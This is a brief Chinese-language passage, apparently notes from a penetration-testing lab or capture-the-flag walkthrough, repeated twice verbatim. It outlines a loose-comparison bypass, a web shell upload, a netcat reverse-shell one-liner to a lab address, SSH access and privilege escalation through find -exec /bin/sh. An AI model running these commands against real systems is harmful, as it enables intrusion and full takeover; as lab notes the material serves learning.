由于此处比较是用==,存在当数组参与比较时,会被当成None,会被转化成0
上传shell.php
成功执行命令
反弹shell
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.16.40 9999 >/tmp/f
SSH连接
find提权
find . -exec /bin/sh \; -quit
由于此处比较是用==,存在当数组参与比较时,会被当成None,会被转化成0
上传shell.php
成功执行命令
反弹shell
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.16.40 9999 >/tmp/f
SSH连接
find提权
find . -exec /bin/sh \; -quit